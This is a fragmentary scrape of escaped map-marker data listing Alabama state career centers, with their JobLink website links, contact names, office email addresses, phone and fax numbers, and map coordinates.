ref=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85880000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eMargaret Hardy\x3cbr\x3e\x3ca href=\"mailto:Selma.CareerCenter@alcc.alabama.gov\" target=\"_blank\"\x3eSelma.CareerCenter@alcc.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 334-872-0471\x3cbr\x3eFax: 334-872-4355",infoWindow:{title:"Selma Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Selma Career Center1112 Water Ave
...[SNIP]...
ref=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85880000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eMargaret Hardy\x3cbr\x3e\x3ca href=\"mailto:Selma.CareerCenter@alcc.alabama.gov\" target=\"_blank\"\x3eSelma.CareerCenter@alcc.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 334-872-0471\x3cbr\x3eFax: 334-872-4355",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.406546,-87.018988\x26thumb=0",photoType
...[SNIP]...
x3ca href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85900000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eJim Cook\x3cbr\x3e\x3ca href=\"mailto:Sheffield.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eSheffield.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 256-383-5610\x3cbr\x3eFax: 256-383-4983",infoWindow:{title:"Sheffield Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Sheffield Career Center500 So
...[SNIP]...
x3ca href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85900000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eJim Cook\x3cbr\x3e\x3ca href=\"mailto:Sheffield.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eSheffield.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 256-383-5610\x3cbr\x3eFax: 256-383-4983",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.753558,-87.698758\x26thumb=0",photoType
...[SNIP]...
a href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85930000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eGwen Taylor\x3cbr\x3e\x3ca href=\"mailto:Talladega.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eTalladega.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 256-480-2109\x3cbr\x3eFax: 256-362-7219",infoWindow:{title:"Talladega Career Center - Central Alabama Comm Col",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Ta
...[SNIP]...
a href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85930000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eGwen Taylor\x3cbr\x3e\x3ca href=\"mailto:Talladega.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eTalladega.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 256-480-2109\x3cbr\x3eFax: 256-362-7219",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.434232,-86.081213\x26thumb=0",photoType
...[SNIP]...
a href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85950000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eGaye Shipes\x3cbr\x3e\x3ca href=\"mailto:Gaye.Shipes@adeca.alabama.gov\" target=\"_blank\"\x3eGaye.Shipes@adeca.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 334-566-3920\x3cbr\x3eFax: 334-566-9450",infoWindow:{title:"Troy Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Troy Career Center1023 South Brund
...[SNIP]...
a href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85950000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eGaye Shipes\x3cbr\x3e\x3ca href=\"mailto:Gaye.Shipes@adeca.alabama.gov\" target=\"_blank\"\x3eGaye.Shipes@adeca.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 334-566-3920\x3cbr\x3eFax: 334-566-9450",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.793667,-85.965821\x26thumb=0",photoType
...[SNIP]...
ef=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85980000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eBrenda Truelove\x3cbr\x3e\x3ca href=\"mailto:Tuscaloosa.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eTuscaloosa.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 205-758-7591\x3cbr\x3eFax: 205-758-1925",infoWindow:{title:"Tuscaloosa Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Tuscaloosa Career Center202
...[SNIP]...
ef=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85980000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eBrenda Truelove\x3cbr\x3e\x3ca href=\"mailto:Tuscaloosa.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eTuscaloosa.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 205-758-7591\x3cbr\x3eFax: 205-758-1925",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.166983,-87.535829\x26thumb=0",photoType
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=75760000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eDonna Edwards\x3cbr\x3e\x3ca href=\"mailto:Opelika.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eOpelika.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 334-756-0024\x3cbr\x3eFax: 334-756-0026",infoWindow:{title:"Valley Career Center - Southern Union Comm College",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Va
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=75760000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eDonna Edwards\x3cbr\x3e\x3ca href=\"mailto:Opelika.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eOpelika.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 334-756-0024\x3cbr\x3eFax: 334-756-0026",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.817563,-85.193590\x26thumb=0",photoType
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=75620000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eLarry Linley\x3cbr\x3e\x3ca href=\"mailto:Birmingham.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eBirmingham.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 205-856-8538\x3cbr\x3eFax: 205-856-6033",infoWindow:{title:"Jeff State Community College Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Jeff State
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=75620000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eLarry Linley\x3cbr\x3e\x3ca href=\"mailto:Birmingham.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eBirmingham.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 205-856-8538\x3cbr\x3eFax: 205-856-6033",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.653005,-86.711019\x26thumb=0",photoType
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=75990000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eMary Garnett\x3cbr\x3e\x3ca href=\"mailto:Hanceville.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eHanceville.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 205-429-4311\x3cbr\x3eFax: 205-429-5402",infoWindow:{title:"Blountsville Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Blountsville Career Center
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=75990000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eMary Garnett\x3cbr\x3e\x3ca href=\"mailto:Hanceville.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eHanceville.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 205-429-4311\x3cbr\x3eFax: 205-429-5402",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.076601,-86.589929\x26thumb=0",photoType
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85230000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eHal Clements\x3cbr\x3e\x3ca href=\"mailto:Hal.Clements@adeca.alabama.gov\" target=\"_blank\"\x3eHal.Clements@adeca.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 251-867-4376\x3cbr\x3eFax: 251-867-5798",infoWindow:{title:"Brewton Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Brewton Career Center1023 Dougl
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85230000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eHal Clements\x3cbr\x3e\x3ca href=\"mailto:Hal.Clements@adeca.alabama.gov\" target=\"_blank\"\x3eHal.Clements@adeca.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 251-867-4376\x3cbr\x3eFax: 251-867-5798",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.121577,-87.068574\x26thumb=0",photoType
...[SNIP]...
ca href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85300000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eAbott Wood\x3cbr\x3e\x3ca href=\"mailto:Decatur.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eDecatur.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 256-355-0142\x3cbr\x3eFax: 256-355-0174",infoWindow:{title:"Decatur Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Decatur Career Center1819 Basse
...[SNIP]...
ca href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85300000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eAbott Wood\x3cbr\x3e\x3ca href=\"mailto:Decatur.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eDecatur.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 256-355-0142\x3cbr\x3eFax: 256-355-0174",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.578513,-86.977680\x26thumb=0",photoType
...[SNIP]...
3ca href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85310000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eKelly Lee\x3cbr\x3e\x3ca href=\"mailto:Demopolis.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eDemopolis.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 334-289-0202\x3cbr\x3eFax: 334-289-8024",infoWindow:{title:"Demopolis Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Demopolis Career Center1074 B
...[SNIP]...
3ca href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85310000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eKelly Lee\x3cbr\x3e\x3ca href=\"mailto:Demopolis.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eDemopolis.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 334-289-0202\x3cbr\x3eFax: 334-289-8024",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.505136,-87.826002\x26thumb=0",photoType
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85330000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3ePam Cutchens\x3cbr\x3e\x3ca href=\"mailto:Dothan.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eDothan.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 334-792-2121\x3cbr\x3eFax: 334-792-2124",infoWindow:{title:"Dothan Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Dothan Career Center787 Ross Cla
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85330000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3ePam Cutchens\x3cbr\x3e\x3ca href=\"mailto:Dothan.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eDothan.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 334-792-2121\x3cbr\x3eFax: 334-792-2124",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.227470,-85.360226\x26thumb=0",photoType
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85380000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eAnita Fulford\x3cbr\x3e\x3ca href=\"mailto:Enterprise.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eEnterprise.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 334-347-0044\x3cbr\x3eFax: 334-393-0958",infoWindow:{title:"Enterprise Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Enterprise Career Center2021
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85380000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eAnita Fulford\x3cbr\x3e\x3ca href=\"mailto:Enterprise.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eEnterprise.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 334-347-0044\x3cbr\x3eFax: 334-393-0958",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.324233,-85.889679\x26thumb=0",photoType
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85390000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eAnn Blondheim\x3cbr\x3e\x3ca href=\"mailto:Eufaula.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eEufaula.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 334-687-3551\x3cbr\x3eFax: 334-687-9964",infoWindow:{title:"Eufaula Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Eufaula Career Center511 State
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85390000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eAnn Blondheim\x3cbr\x3e\x3ca href=\"mailto:Eufaula.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eEufaula.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 334-687-3551\x3cbr\x3eFax: 334-687-9964",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.867498,-85.150445\x26thumb=0",photoType
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=75610000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eSharron Owens\x3cbr\x3e\x3ca href=\"mailto:Jasper.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eJasper.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 205-932-3221\x3cbr\x3eFax: 205-384-0260",infoWindow:{title:"Fayette Career Center -Bevill State Community Coll",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Fa
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=75610000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eSharron Owens\x3cbr\x3e\x3ca href=\"mailto:Jasper.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eJasper.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 205-932-3221\x3cbr\x3eFax: 205-384-0260",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.724812,-87.815613\x26thumb=0",photoType
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85450000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eSteve Woolley\x3cbr\x3e\x3ca href=\"mailto:Foley.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eFoley.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 251-943-1575\x3cbr\x3eFax: 251-943-8867",infoWindow:{title:"Foley Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Foley Career Center200 West Michi
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85450000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eSteve Woolley\x3cbr\x3e\x3ca href=\"mailto:Foley.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eFoley.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 251-943-1575\x3cbr\x3eFax: 251-943-8867",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=30.392145,-87.685568\x26thumb=0",photoType
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85470000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eLinda McCain\x3cbr\x3e\x3ca href=\"mailto:FortPayne.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eFortPayne.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 256-845-2900\x3cbr\x3eFax: 256-845-5139",infoWindow:{title:"Fort Payne Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Fort Payne Career Center2100
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85470000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eLinda McCain\x3cbr\x3e\x3ca href=\"mailto:FortPayne.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eFortPayne.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 256-845-2900\x3cbr\x3eFax: 256-845-5139",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.430245,-85.758709\x26thumb=0",photoType
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85500000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eLarry Foster\x3cbr\x3e\x3ca href=\"mailto:Gadsden.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eGadsden.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 256-546-4667\x3cbr\x3eFax: 256-546-6603",infoWindow:{title:"Gadsden Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Gadsden Career Center216 North
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85500000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eLarry Foster\x3cbr\x3e\x3ca href=\"mailto:Gadsden.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eGadsden.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 256-546-4667\x3cbr\x3eFax: 256-546-6603",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.014669,-86.004037\x26thumb=0",photoType
...[SNIP]...
ref=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85510000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eJanice Grayson\x3cbr\x3e\x3ca href=\"mailto:Greenville.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eGreenville.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 334-382-3128\x3cbr\x3eFax: 334-382-9066",infoWindow:{title:"Greenville Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Greenville Career Center117
...[SNIP]...
ref=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85510000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eJanice Grayson\x3cbr\x3e\x3ca href=\"mailto:Greenville.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eGreenville.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 334-382-3128\x3cbr\x3eFax: 334-382-9066",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.829552,-86.624472\x26thumb=0",photoType
...[SNIP]...
a href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=75520000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eMonday only\x3cbr\x3e\x3ca href=\"mailto:Sharyn.Blanton@adeca.alabama.gov\" target=\"_blank\"\x3eSharyn.Blanton@adeca.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 205-486-4154\x3cbr\x3eFax: 205-486-4154",infoWindow:{title:"Haleyville Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Haleyville Career Center2010
...[SNIP]...
a href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=75520000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eMonday only\x3cbr\x3e\x3ca href=\"mailto:Sharyn.Blanton@adeca.alabama.gov\" target=\"_blank\"\x3eSharyn.Blanton@adeca.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 205-486-4154\x3cbr\x3eFax: 205-486-4154",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.226425,-87.624083\x26thumb=0",photoType
...[SNIP]...
ref=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85520000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eSharyn Blanton\x3cbr\x3e\x3ca href=\"mailto:Sharyn.Blanton@adeca.alabama.gov\" target=\"_blank\"\x3eSharyn.Blanton@adeca.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 205-921-7657\x3cbr\x3eFax: 205-921-0438",infoWindow:{title:"Hamilton Career Center - Bevill State Comm College",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Ha
...[SNIP]...
ref=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85520000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eSharyn Blanton\x3cbr\x3e\x3ca href=\"mailto:Sharyn.Blanton@adeca.alabama.gov\" target=\"_blank\"\x3eSharyn.Blanton@adeca.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 205-921-7657\x3cbr\x3eFax: 205-921-0438",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.132553,-87.990048\x26thumb=0",photoType
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85270000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eSandra Rhodes\x3cbr\x3e\x3ca href=\"mailto:Hanceville.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eHanceville.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 256-352-5538\x3cbr\x3eFax: 256-352-8429",infoWindow:{title:"Hanceville Career Center - Wallace State Comm Coll",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Ha
...[SNIP]...
href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85270000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eSandra Rhodes\x3cbr\x3e\x3ca href=\"mailto:Hanceville.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eHanceville.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 256-352-5538\x3cbr\x3eFax: 256-352-8429",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.072591,-86.778221\x26thumb=0",photoType
...[SNIP]...
a href=\"https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm?ofiid=85560000\" target=\"_blank\"\x3eWebsite\x3c/a\x3e\x3cbr\x3e\x3cbr\x3eContact:\x3cbr\x3eMike Fowler\x3cbr\x3e\x3ca href=\"mailto:Huntsville.CareerCenter@dir.alabama.gov\" target=\"_blank\"\x3eHuntsville.CareerCenter@dir.alabama.gov\x3c/a\x3e\x3cbr\x3ePhone: 256-851-0537\x3cbr\x3eFax: 256-851-8278",infoWindow:{title:"Huntsville Career Center",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Huntsville Career Center2535
...[SNIP]...
